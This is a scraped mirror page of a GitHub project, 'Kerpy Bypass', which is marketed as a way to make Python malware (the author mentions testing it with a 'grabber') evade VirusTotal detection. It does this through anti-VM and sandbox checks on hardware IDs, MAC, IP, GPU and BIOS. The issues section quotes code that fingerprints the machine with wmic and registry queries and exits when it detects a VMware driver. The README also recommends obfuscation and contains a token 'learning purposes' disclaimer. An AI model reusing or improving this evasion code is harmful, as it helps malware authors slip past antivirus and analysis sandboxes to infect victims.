Git Product home page Git Product logo

bypass-virus-total's Introduction

Kerpy Bypass ✅

Before ❌

18detect

After ✅

2detect

Install ❗️

git clone https://github.com/Lawxsz/bypass-virus-total
pip3 install -r requeriments.txt

Paste all the code in your script and done!! (be sure to leave the if main)

Features

  • 🚀 Auto Updater List
  • 🌠 +1500 VM List Blocked
  • ⚡ Anti-VM (RDP, VirtualBox, etc)
  • 🌟 Filters: MAC, HWID, IP, NAME, GPU, GUIDS, BIOS, AND DLL!

IMPORTANT!

  • I do not support any type of malicious activity with my code, nor take any responsability for any damage caused by it. Use at your own risk.
  • For learning purposes

Note

  • ⭐️ Give me a Star!! Kerpy is constantly updating, support us!
  • The analysis was done with my grabber (+8 features), this without having obfuscated the source code (either with pyarmor etc), I recommend using Kerpy + obfuscate your code for best results.

Contact Me 💻

Telegram: @Lawxsz Discord: Lawxsz#5963 (if not work, tell me in telegram) https://t.me/lawxszchannel

bypass-virus-total's People

Contributors

lawxsz avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar

bypass-virus-total's Issues

how to do you build the exe?

hi building with pyinstaller it littarly doesn't matter what is the code it will get detected as virus
so how to build the exe?

a little help

current_hwid = subprocess.check_output('wmic csproduct get uuid').decode().split('\n')[1].strip()
current_baseboard_manufacturer = subprocess.check_output('wmic baseboard get manufacturer').decode().split('\n')[1].strip()
current_diskdrive_serial = subprocess.check_output('wmic diskdrive get serialnumber').decode().split('\n')[1].strip()
current_cpu_serial = subprocess.check_output('wmic cpu get serialnumber').decode().split('\n')[1].strip()
current_bios_serial = subprocess.check_output('wmic bios get serialnumber').decode().split('\n')[1].strip()
current_baseboard_serial = subprocess.check_output('wmic baseboard get serialnumber').decode().split('\n')[1].strip()

def get_guid():
    try:
        reg_connection = winreg.ConnectRegistry(None, winreg.HKEY_LOCAL_MACHINE)
        key_value = winreg.OpenKey(reg_connection, r"SOFTWARE\Microsoft\Cryptography")
        print("GUID: " + winreg.QueryValueEx(key_value, "MachineGuid")[0])
        return winreg.QueryValueEx(key_value, "MachineGuid")[0]
    except Exception as e:
        print(e)
        pass

def get_hwguid():
    try:
        reg_connection = winreg.ConnectRegistry(None, winreg.HKEY_LOCAL_MACHINE)
        key_value = winreg.OpenKey(reg_connection,
                                   r"SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware Profiles\0001")
        print("GUID: " + winreg.QueryValueEx(key_value, "HwProfileGuid")[0])
        return winreg.QueryValueEx(key_value, "HwProfileGuid")[0]
    except Exception as e:
        print(e)
        pass

hwguid = f'{get_hwguid()}'.replace('{', ' ').replace('}', ' ')

install error

so, when trying to install the requirements, i got this error
image

Irrelevant Registry Check

This part of the code is completely irrelevant.
It is supposed to be a Graphic Driver registry and not necessarily VMWare.

    def registry_check(self):
        cmd = "REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\"
        reg1 = subprocess.run(cmd + "DriverDesc", shell=True, stderr=subprocess.DEVNULL)
        reg2 = subprocess.run(cmd + "ProviderName", shell=True, stderr=subprocess.DEVNULL)
        if reg1.returncode == 0 and reg2.returncode == 0:
            print("VMware Registry Detected")
            sys.exit()

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.